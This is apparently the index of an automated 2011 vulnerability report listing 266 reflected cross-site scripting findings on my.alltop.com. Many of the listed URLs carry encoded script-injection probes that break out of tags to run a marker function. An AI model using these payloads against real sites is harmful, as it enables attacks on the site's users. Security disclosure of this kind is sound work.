XSS, my.alltop.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Mar 09 13:01:52 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://my.alltop.com/ ['"--> parameter]

1.2. http://my.alltop.com/ [name of an arbitrarily supplied request parameter]

1.3. http://my.alltop.com/ [nsextt parameter]

1.4. http://my.alltop.com/adamengst [name of an arbitrarily supplied request parameter]

1.5. http://my.alltop.com/adamengst [nsextt parameter]

1.6. http://my.alltop.com/alisonvandiggelen [name of an arbitrarily supplied request parameter]

1.7. http://my.alltop.com/alisonvandiggelen [nsextt parameter]

1.8. http://my.alltop.com/alpha/ ['"--> parameter]

1.9. http://my.alltop.com/alpha/ [name of an arbitrarily supplied request parameter]

1.10. http://my.alltop.com/alpha/ [nsextt parameter]

1.11. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 2]

1.12. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 3]

1.13. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 4]

1.14. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 5]

1.15. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.16. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [REST URL parameter 2]

1.17. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [name of an arbitrarily supplied request parameter]

1.18. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [REST URL parameter 2]

1.19. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [name of an arbitrarily supplied request parameter]

1.20. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [REST URL parameter 2]

1.21. http://my.alltop.com/alpha/Netsparker4f00ab442f3c4489907c3aca1dc48f4e/ [name of an arbitrarily supplied request parameter]

1.22. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [REST URL parameter 2]

1.23. http://my.alltop.com/alpha/Netsparker555a01dc7e30494e9aa81771d27cf02b/ [name of an arbitrarily supplied request parameter]

1.24. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [REST URL parameter 2]

1.25. http://my.alltop.com/alpha/Netsparker9d927c791f2b45f8998050faa9d3c24a/ [name of an arbitrarily supplied request parameter]

1.26. http://my.alltop.com/alpha/a [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000135)%3C/script%3E parameter]

1.27. http://my.alltop.com/alpha/a ['"--> parameter]

1.28. http://my.alltop.com/alpha/a [REST URL parameter 2]

1.29. http://my.alltop.com/alpha/a [name of an arbitrarily supplied request parameter]

1.30. http://my.alltop.com/alpha/a [nsextt parameter]

1.31. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 2]

1.32. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 3]

1.33. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 4]

1.34. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 5]

1.35. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.36. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 2]

1.37. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 3]

1.38. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [name of an arbitrarily supplied request parameter]

1.39. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 2]

1.40. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 3]

1.41. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [name of an arbitrarily supplied request parameter]

1.42. http://my.alltop.com/alpha/b ['"--> parameter]

1.43. http://my.alltop.com/alpha/b [REST URL parameter 2]

1.44. http://my.alltop.com/alpha/b [name of an arbitrarily supplied request parameter]

1.45. http://my.alltop.com/alpha/b [nsextt parameter]

1.46. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 2]

1.47. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 3]

1.48. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 4]

1.49. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 5]

1.50. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.51. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 2]

1.52. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 3]

1.53. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [name of an arbitrarily supplied request parameter]

1.54. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 2]

1.55. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 3]

1.56. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [name of an arbitrarily supplied request parameter]

1.57. http://my.alltop.com/alpha/c ['"--> parameter]

1.58. http://my.alltop.com/alpha/c [REST URL parameter 2]

1.59. http://my.alltop.com/alpha/c [name of an arbitrarily supplied request parameter]

1.60. http://my.alltop.com/alpha/c [nsextt parameter]

1.61. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 2]

1.62. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 3]

1.63. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 4]

1.64. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 5]

1.65. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.66. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 2]

1.67. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [REST URL parameter 3]

1.68. http://my.alltop.com/alpha/c/%22ns=%22netsparker(0x00017F) [name of an arbitrarily supplied request parameter]

1.69. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 2]

1.70. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 3]

1.71. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [name of an arbitrarily supplied request parameter]

1.72. http://my.alltop.com/alpha/d ['"--> parameter]

1.73. http://my.alltop.com/alpha/d [REST URL parameter 2]

1.74. http://my.alltop.com/alpha/d [name of an arbitrarily supplied request parameter]

1.75. http://my.alltop.com/alpha/d [nsextt parameter]

1.76. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 2]

1.77. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 3]

1.78. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 4]

1.79. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 5]

1.80. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.81. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 2]

1.82. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 3]

1.83. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [name of an arbitrarily supplied request parameter]

1.84. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 2]

1.85. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 3]

1.86. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [name of an arbitrarily supplied request parameter]

1.87. http://my.alltop.com/alpha/e ['"--> parameter]

1.88. http://my.alltop.com/alpha/e [REST URL parameter 2]

1.89. http://my.alltop.com/alpha/e [name of an arbitrarily supplied request parameter]

1.90. http://my.alltop.com/alpha/e [nsextt parameter]

1.91. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 2]

1.92. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 3]

1.93. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 4]

1.94. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 5]

1.95. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.96. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 2]

1.97. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 3]

1.98. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [name of an arbitrarily supplied request parameter]

1.99. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 2]

1.100. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 3]

1.101. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [name of an arbitrarily supplied request parameter]

1.102. http://my.alltop.com/alpha/f ['"--> parameter]

1.103. http://my.alltop.com/alpha/f [REST URL parameter 2]

1.104. http://my.alltop.com/alpha/f [name of an arbitrarily supplied request parameter]

1.105. http://my.alltop.com/alpha/f [nsextt parameter]

1.106. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 2]

1.107. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 3]

1.108. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 4]

1.109. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 5]

1.110. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.111. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 2]

1.112. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 3]

1.113. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [name of an arbitrarily supplied request parameter]

1.114. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 2]

1.115. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 3]

1.116. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [name of an arbitrarily supplied request parameter]

1.117. http://my.alltop.com/alpha/g ['"--> parameter]

1.118. http://my.alltop.com/alpha/g [REST URL parameter 2]

1.119. http://my.alltop.com/alpha/g [name of an arbitrarily supplied request parameter]

1.120. http://my.alltop.com/alpha/g [nsextt parameter]

1.121. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 2]

1.122. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 3]

1.123. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 4]

1.124. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 5]

1.125. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.126. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 2]

1.127. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 3]

1.128. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [name of an arbitrarily supplied request parameter]

1.129. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 2]

1.130. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 3]

1.131. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [name of an arbitrarily supplied request parameter]

1.132. http://my.alltop.com/alpha/h ['"--> parameter]

1.133. http://my.alltop.com/alpha/h [REST URL parameter 2]

1.134. http://my.alltop.com/alpha/h [name of an arbitrarily supplied request parameter]

1.135. http://my.alltop.com/alpha/h [nsextt parameter]

1.136. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 2]

1.137. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 3]

1.138. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 4]

1.139. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 5]

1.140. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.141. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 2]

1.142. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 3]

1.143. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [name of an arbitrarily supplied request parameter]

1.144. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 2]

1.145. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 3]

1.146. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [name of an arbitrarily supplied request parameter]

1.147. http://my.alltop.com/alpha/i ['"--> parameter]

1.148. http://my.alltop.com/alpha/i [REST URL parameter 2]

1.149. http://my.alltop.com/alpha/i [name of an arbitrarily supplied request parameter]

1.150. http://my.alltop.com/alpha/i [nsextt parameter]

1.151. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 2]

1.152. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 3]

1.153. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 4]

1.154. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 5]

1.155. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.156. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 2]

1.157. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 3]

1.158. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [name of an arbitrarily supplied request parameter]

1.159. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 2]

1.160. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 3]

1.161. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [name of an arbitrarily supplied request parameter]

1.162. http://my.alltop.com/alpha/j [REST URL parameter 2]

1.163. http://my.alltop.com/alpha/j [name of an arbitrarily supplied request parameter]

1.164. http://my.alltop.com/alpha/k [REST URL parameter 2]

1.165. http://my.alltop.com/alpha/k [name of an arbitrarily supplied request parameter]

1.166. http://my.alltop.com/alpha/l [REST URL parameter 2]

1.167. http://my.alltop.com/alpha/l [name of an arbitrarily supplied request parameter]

1.168. http://my.alltop.com/alpha/m [REST URL parameter 2]

1.169. http://my.alltop.com/alpha/n [REST URL parameter 2]

1.170. http://my.alltop.com/alpha/n [name of an arbitrarily supplied request parameter]

1.171. http://my.alltop.com/alpha/o ['"--> parameter]

1.172. http://my.alltop.com/alpha/o [REST URL parameter 2]

1.173. http://my.alltop.com/alpha/o [name of an arbitrarily supplied request parameter]

1.174. http://my.alltop.com/alpha/o [nsextt parameter]

1.175. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 2]

1.176. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 3]

1.177. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 4]

1.178. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 5]

1.179. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.180. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 2]

1.181. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 3]

1.182. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [name of an arbitrarily supplied request parameter]

1.183. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 2]

1.184. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 3]

1.185. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [name of an arbitrarily supplied request parameter]

1.186. http://my.alltop.com/alpha/p ['"--> parameter]

1.187. http://my.alltop.com/alpha/p [REST URL parameter 2]

1.188. http://my.alltop.com/alpha/p [name of an arbitrarily supplied request parameter]

1.189. http://my.alltop.com/alpha/p [nsextt parameter]

1.190. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 2]

1.191. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 3]

1.192. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 4]

1.193. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [REST URL parameter 5]

1.194. http://my.alltop.com/alpha/p'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EA)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.195. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 2]

1.196. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [REST URL parameter 3]

1.197. http://my.alltop.com/alpha/p/%22ns=%22netsparker(0x0001EE) [name of an arbitrarily supplied request parameter]

1.198. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 2]

1.199. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 3]

1.200. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [name of an arbitrarily supplied request parameter]

1.201. http://my.alltop.com/alpha/q [REST URL parameter 2]

1.202. http://my.alltop.com/alpha/q [name of an arbitrarily supplied request parameter]

1.203. http://my.alltop.com/alpha/r [REST URL parameter 2]

1.204. http://my.alltop.com/alpha/r [name of an arbitrarily supplied request parameter]

1.205. http://my.alltop.com/alpha/s [REST URL parameter 2]

1.206. http://my.alltop.com/alpha/s [name of an arbitrarily supplied request parameter]

1.207. http://my.alltop.com/alpha/t ['"--> parameter]

1.208. http://my.alltop.com/alpha/t [REST URL parameter 2]

1.209. http://my.alltop.com/alpha/t [name of an arbitrarily supplied request parameter]

1.210. http://my.alltop.com/alpha/t [nsextt parameter]

1.211. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 2]

1.212. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 3]

1.213. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 4]

1.214. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 5]

1.215. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.216. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 2]

1.217. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 3]

1.218. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [name of an arbitrarily supplied request parameter]

1.219. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 2]

1.220. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 3]

1.221. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [name of an arbitrarily supplied request parameter]

1.222. http://my.alltop.com/alpha/u [REST URL parameter 2]

1.223. http://my.alltop.com/alpha/u [name of an arbitrarily supplied request parameter]

1.224. http://my.alltop.com/alpha/v [REST URL parameter 2]

1.225. http://my.alltop.com/alpha/v [name of an arbitrarily supplied request parameter]

1.226. http://my.alltop.com/alpha/w ['"--> parameter]

1.227. http://my.alltop.com/alpha/w [REST URL parameter 2]

1.228. http://my.alltop.com/alpha/w [name of an arbitrarily supplied request parameter]

1.229. http://my.alltop.com/alpha/w [nsextt parameter]

1.230. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 2]

1.231. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 3]

1.232. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 4]

1.233. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 5]

1.234. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.235. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 2]

1.236. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 3]

1.237. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [name of an arbitrarily supplied request parameter]

1.238. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 2]

1.239. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 3]

1.240. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [name of an arbitrarily supplied request parameter]

1.241. http://my.alltop.com/alpha/x [REST URL parameter 2]

1.242. http://my.alltop.com/alpha/x [name of an arbitrarily supplied request parameter]

1.243. http://my.alltop.com/alpha/y ['"--> parameter]

1.244. http://my.alltop.com/alpha/y [REST URL parameter 2]

1.245. http://my.alltop.com/alpha/y [name of an arbitrarily supplied request parameter]

1.246. http://my.alltop.com/alpha/y [nsextt parameter]

1.247. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 2]

1.248. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 3]

1.249. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 4]

1.250. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 5]

1.251. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.252. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 2]

1.253. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 3]

1.254. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [name of an arbitrarily supplied request parameter]

1.255. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [REST URL parameter 2]

1.256. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [REST URL parameter 3]

1.257. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [name of an arbitrarily supplied request parameter]

1.258. http://my.alltop.com/alpha/z [REST URL parameter 2]

1.259. http://my.alltop.com/alpha/z [name of an arbitrarily supplied request parameter]

1.260. http://my.alltop.com/alpha/z [nsextt parameter]

1.261. http://my.alltop.com/css/ ['"--> parameter]

1.262. http://my.alltop.com/css/ [name of an arbitrarily supplied request parameter]

1.263. http://my.alltop.com/css/ [nsextt parameter]

1.264. http://my.alltop.com/img/ [name of an arbitrarily supplied request parameter]

1.265. http://my.alltop.com/img/ [nsextt parameter]

1.266. http://my.alltop.com/img/mugs/ [name of an arbitrarily supplied request parameter]

